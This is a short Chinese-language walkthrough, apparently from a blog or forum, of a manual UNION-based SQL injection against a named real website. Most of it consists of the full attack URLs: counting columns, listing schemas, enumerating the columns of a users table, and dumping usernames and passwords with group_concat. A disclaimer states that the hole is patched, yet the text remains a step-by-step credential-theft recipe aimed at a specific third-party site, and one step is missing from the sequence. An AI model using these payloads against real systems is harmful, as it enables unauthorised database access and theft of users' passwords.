好早之前的網站了,漏洞已經被填上了,請大家不要嘗試!
目標:http://www.qdmjzz.org/
1、首先是拆解:http://www.qdmjzz.org/show.php?id=7829 and 1=2 union select 1,2,3,4,5,6,7-- 這樣一直找到正確的列數 也可以直接用order by 後面接數,表示有多少行。這樣就可以猜到共有19行。發現可以回顯的是3,4,13.在這些位置我們可以使用函數來回顯數據庫裏面的數據。
2、查詢數據庫和表:http://www.qdmjzz.org/show.php?id=7829%20and%201=2%20union%20select%201,2,database%28%29,group_concat%28schema_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20information_schema.SCHEMATA--
出現內容如下:
4、查詢某一張表有哪些字段:http://www.qdmjzz.org/show.php?id=7829%20and%201=2%20union%20select%201,2,database%28%29,group_concat%28column_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20information_schema.columns%20where%20table_name=0x7573657273--
5、查詢每一個字段的內容:http://www.qdmjzz.org/show.php?id=7829%20and%201=2%20union%20select%201,2,passwd,name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20users
當讓這樣只是得到一個數據而已,如果想要將所有用戶名密碼都爆出,羣裏面的一位女士給出的答案:用group_concat(name),group_concat(passwd)。這樣就可以回顯了。